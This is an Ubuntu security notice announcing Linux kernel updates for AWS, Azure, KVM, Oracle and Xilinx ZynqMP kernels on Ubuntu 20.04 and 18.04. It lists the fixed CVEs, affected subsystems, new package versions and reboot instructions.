    ==========================================================================Ubuntu Security Notice USN-7088-4November 07, 2024linux-aws, linux-azure-5.4, linux-kvm, linux-oracle, linux-xilinx-zynqmpvulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTS- Ubuntu 18.04 LTSSummary:Several security issues were fixed in the Linux kernel.Software Description:- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-kvm: Linux kernel for cloud environments- linux-oracle: Linux kernel for Oracle Cloud systems- linux-xilinx-zynqmp: Linux kernel for Xilinx ZynqMP processors- linux-azure-5.4: Linux kernel for Microsoft Azure cloud systemsDetails:Ziming Zhang discovered that the VMware Virtual GPU DRM driver in theLinux kernel contained an integer overflow vulnerability. A localattacker could use this to cause a denial of service (system crash).(CVE-2022-36402)Several security issues were discovered in the Linux kernel.An attacker could possibly use these to compromise the system.This update corrects flaws in the following subsystems:  - ARM64 architecture;  - PowerPC architecture;  - User-Mode Linux (UML);  - x86 architecture;  - Block layer subsystem;  - Cryptographic API;  - Android drivers;  - Serial ATA and Parallel ATA drivers;  - ATM drivers;  - Drivers core;  - CPU frequency scaling framework;  - Device frequency scaling framework;  - GPU drivers;  - HID subsystem;  - Hardware monitoring drivers;  - InfiniBand drivers;  - Input Device core drivers;  - Input Device (Miscellaneous) drivers;  - IOMMU subsystem;  - IRQ chip drivers;  - ISDN/mISDN subsystem;  - LED subsystem;  - Multiple devices driver;  - Media drivers;  - EEPROM drivers;  - VMware VMCI Driver;  - MMC subsystem;  - Network drivers;  - Near Field Communication (NFC) drivers;  - NVME drivers;  - Device tree and open firmware driver;  - Parport drivers;  - PCI subsystem;  - Pin controllers subsystem;  - Remote Processor subsystem;  - S/390 drivers;  - SCSI drivers;  - QCOM SoC drivers;  - Direct Digital Synthesis drivers;  - TTY drivers;  - Userspace I/O drivers;  - DesignWare USB3 driver;  - USB Gadget drivers;  - USB Serial drivers;  - BTRFS file system;  - File systems infrastructure;  - Ext4 file system;  - F2FS file system;  - JFS file system;  - NILFS2 file system;  - BPF subsystem;  - Core kernel;  - DMA mapping infrastructure;  - Tracing infrastructure;  - Radix Tree data structure library;  - Kernel userspace event delivery library;  - Objagg library;  - Memory management;  - Amateur Radio drivers;  - Bluetooth subsystem;  - CAN network layer;  - Networking core;  - Ethtool driver;  - IPv4 networking;  - IPv6 networking;  - IUCV driver;  - KCM (Kernel Connection Multiplexor) sockets driver;  - MAC80211 subsystem;  - Netfilter;  - Network traffic control;  - SCTP protocol;  - Sun RPC protocol;  - TIPC protocol;  - TLS protocol;  - Wireless networking;  - AppArmor security module;  - Simplified Mandatory Access Control Kernel framework;  - SoC audio core drivers;  - USB sound devices;(CVE-2024-35848, CVE-2024-43853, CVE-2024-41017, CVE-2024-26607,CVE-2024-43839, CVE-2024-41072, CVE-2024-46815, CVE-2023-52614,CVE-2024-46798, CVE-2024-46676, CVE-2024-43914, CVE-2024-43841,CVE-2024-41012, CVE-2024-27051, CVE-2024-46738, CVE-2024-47663,CVE-2024-46723, CVE-2024-46740, CVE-2024-42287, CVE-2024-46750,CVE-2024-43894, CVE-2023-52531, CVE-2024-47668, CVE-2024-47669,CVE-2024-46685, CVE-2024-41011, CVE-2024-41064, CVE-2024-42305,CVE-2024-41073, CVE-2024-46829, CVE-2024-43860, CVE-2024-46679,CVE-2024-44999, CVE-2024-46817, CVE-2024-26800, CVE-2024-46689,CVE-2024-43908, CVE-2024-46739, CVE-2024-43893, CVE-2024-46828,CVE-2024-46777, CVE-2024-46721, CVE-2024-36484, CVE-2024-46822,CVE-2024-46840, CVE-2024-43880, CVE-2024-46781, CVE-2024-46673,CVE-2024-26669, CVE-2024-41098, CVE-2024-46737, CVE-2024-43871,CVE-2024-42281, CVE-2024-42301, CVE-2024-44995, CVE-2024-43879,CVE-2024-26668, CVE-2024-44965, CVE-2024-41068, CVE-2024-41059,CVE-2024-42229, CVE-2024-44987, CVE-2024-46745, CVE-2024-26891,CVE-2024-46719, CVE-2024-42292, CVE-2024-44952, CVE-2024-46756,CVE-2024-45028, CVE-2024-42283, CVE-2024-45025, CVE-2024-46743,CVE-2024-43867, CVE-2024-46771, CVE-2024-41081, CVE-2024-42244,CVE-2024-42284, CVE-2024-43858, CVE-2024-44998, CVE-2024-46758,CVE-2024-46800, CVE-2024-45003, CVE-2024-44935, CVE-2024-38611,CVE-2024-46844, CVE-2024-44954, CVE-2024-42313, CVE-2024-46783,CVE-2024-42311, CVE-2024-46761, CVE-2024-41022, CVE-2024-43829,CVE-2024-43835, CVE-2024-43846, CVE-2024-46755, CVE-2024-47667,CVE-2024-42259, CVE-2024-41090, CVE-2024-42310, CVE-2024-42265,CVE-2024-42295, CVE-2024-46818, CVE-2024-46780, CVE-2024-44948,CVE-2024-44960, CVE-2024-44988, CVE-2024-46757, CVE-2024-45021,CVE-2024-46747, CVE-2024-43854, CVE-2024-42304, CVE-2021-47212,CVE-2024-42309, CVE-2024-44946, CVE-2024-46744, CVE-2024-42285,CVE-2024-46782, CVE-2024-43856, CVE-2024-41091, CVE-2024-42131,CVE-2024-43830, CVE-2024-42290, CVE-2024-45008, CVE-2024-42276,CVE-2024-47659, CVE-2024-40929, CVE-2024-46714, CVE-2023-52918,CVE-2024-44947, CVE-2024-42289, CVE-2024-42246, CVE-2024-41071,CVE-2024-43883, CVE-2024-46722, CVE-2024-38602, CVE-2024-43882,CVE-2024-42280, CVE-2024-46759, CVE-2024-42271, CVE-2024-44969,CVE-2024-44944, CVE-2024-46675, CVE-2024-41020, CVE-2024-41042,CVE-2024-42306, CVE-2024-46677, CVE-2024-42288, CVE-2024-41070,CVE-2024-45026, CVE-2024-41065, CVE-2024-26885, CVE-2024-42286,CVE-2024-41063, CVE-2024-43884, CVE-2024-42297, CVE-2024-43890,CVE-2024-43861, CVE-2024-45006, CVE-2024-26640, CVE-2024-26641,CVE-2024-41015)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS  linux-image-5.4.0-1054-xilinx-zynqmp  5.4.0-1054.58  linux-image-5.4.0-1123-kvm      5.4.0-1123.131  linux-image-5.4.0-1134-oracle   5.4.0-1134.143  linux-image-5.4.0-1135-aws      5.4.0-1135.145  linux-image-aws-lts-20.04       5.4.0.1135.132  linux-image-kvm                 5.4.0.1123.119  linux-image-oracle-lts-20.04    5.4.0.1134.127  linux-image-xilinx-zynqmp       5.4.0.1054.54Ubuntu 18.04 LTS  linux-image-5.4.0-1140-azure    5.4.0-1140.147~18.04.1          Available with Ubuntu Pro  linux-image-azure               5.4.0.1140.147~18.04.1          Available with Ubuntu ProAfter a standard system update you need to reboot your computer to makeall the necessary changes.ATTENTION: Due to an unavoidable ABI change the kernel updates havebeen given a new version number, which requires you to recompile andreinstall all third party kernel modules you might have installed.Unless you manually uninstalled the standard kernel metapackages(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,linux-powerpc), a standard system upgrade will automatically performthis as well.References:  https://ubuntu.com/security/notices/USN-7088-4  https://ubuntu.com/security/notices/USN-7088-3  https://ubuntu.com/security/notices/USN-7088-2  https://ubuntu.com/security/notices/USN-7088-1  CVE-2021-47212, CVE-2022-36402, CVE-2023-52531, CVE-2023-52614,  CVE-2023-52918, CVE-2024-26607, CVE-2024-26640, CVE-2024-26641,  CVE-2024-26668, CVE-2024-26669, CVE-2024-26800, CVE-2024-26885,  CVE-2024-26891, CVE-2024-27051, CVE-2024-35848, CVE-2024-36484,  CVE-2024-38602, CVE-2024-38611, CVE-2024-40929, CVE-2024-41011,  CVE-2024-41012, CVE-2024-41015, CVE-2024-41017, CVE-2024-41020,  CVE-2024-41022, CVE-2024-41042, CVE-2024-41059, CVE-2024-41063,  CVE-2024-41064, CVE-2024-41065, CVE-2024-41068, CVE-2024-41070,  CVE-2024-41071, CVE-2024-41072, CVE-2024-41073, CVE-2024-41081,  CVE-2024-41090, CVE-2024-41091, CVE-2024-41098, CVE-2024-42131,  CVE-2024-42229, CVE-2024-42244, CVE-2024-42246, CVE-2024-42259,  CVE-2024-42265, CVE-2024-42271, CVE-2024-42276, CVE-2024-42280,  CVE-2024-42281, CVE-2024-42283, CVE-2024-42284, CVE-2024-42285,  CVE-2024-42286, CVE-2024-42287, CVE-2024-42288, CVE-2024-42289,  CVE-2024-42290, CVE-2024-42292, CVE-2024-42295, CVE-2024-42297,  CVE-2024-42301, CVE-2024-42304, CVE-2024-42305, CVE-2024-42306,  CVE-2024-42309, CVE-2024-42310, CVE-2024-42311, CVE-2024-42313,  CVE-2024-43829, CVE-2024-43830, CVE-2024-43835, CVE-2024-43839,  CVE-2024-43841, CVE-2024-43846, CVE-2024-43853, CVE-2024-43854,  CVE-2024-43856, CVE-2024-43858, CVE-2024-43860, CVE-2024-43861,  CVE-2024-43867, CVE-2024-43871, CVE-2024-43879, CVE-2024-43880,  CVE-2024-43882, CVE-2024-43883, CVE-2024-43884, CVE-2024-43890,  CVE-2024-43893, CVE-2024-43894, CVE-2024-43908, CVE-2024-43914,  CVE-2024-44935, CVE-2024-44944, CVE-2024-44946, CVE-2024-44947,  CVE-2024-44948, CVE-2024-44952, CVE-2024-44954, CVE-2024-44960,  CVE-2024-44965, CVE-2024-44969, CVE-2024-44987, CVE-2024-44988,  CVE-2024-44995, CVE-2024-44998, CVE-2024-44999, CVE-2024-45003,  CVE-2024-45006, CVE-2024-45008, CVE-2024-45021, CVE-2024-45025,  CVE-2024-45026, CVE-2024-45028, CVE-2024-46673, CVE-2024-46675,  CVE-2024-46676, CVE-2024-46677, CVE-2024-46679, CVE-2024-46685,  CVE-2024-46689, CVE-2024-46714, CVE-2024-46719, CVE-2024-46721,  CVE-2024-46722, CVE-2024-46723, CVE-2024-46737, CVE-2024-46738,  CVE-2024-46739, CVE-2024-46740, CVE-2024-46743, CVE-2024-46744,  CVE-2024-46745, CVE-2024-46747, CVE-2024-46750, CVE-2024-46755,  CVE-2024-46756, CVE-2024-46757, CVE-2024-46758, CVE-2024-46759,  CVE-2024-46761, CVE-2024-46771, CVE-2024-46777, CVE-2024-46780,  CVE-2024-46781, CVE-2024-46782, CVE-2024-46783, CVE-2024-46798,  CVE-2024-46800, CVE-2024-46815, CVE-2024-46817, CVE-2024-46818,  CVE-2024-46822, CVE-2024-46828, CVE-2024-46829, CVE-2024-46840,  CVE-2024-46844, CVE-2024-47659, CVE-2024-47663, CVE-2024-47667,  CVE-2024-47668, CVE-2024-47669Package Information:  https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1135.145  https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1123.131  https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1134.143  https://launchpad.net/ubuntu/+source/linux-xilinx-zynqmp/5.4.0-1054.58

Tag

#aws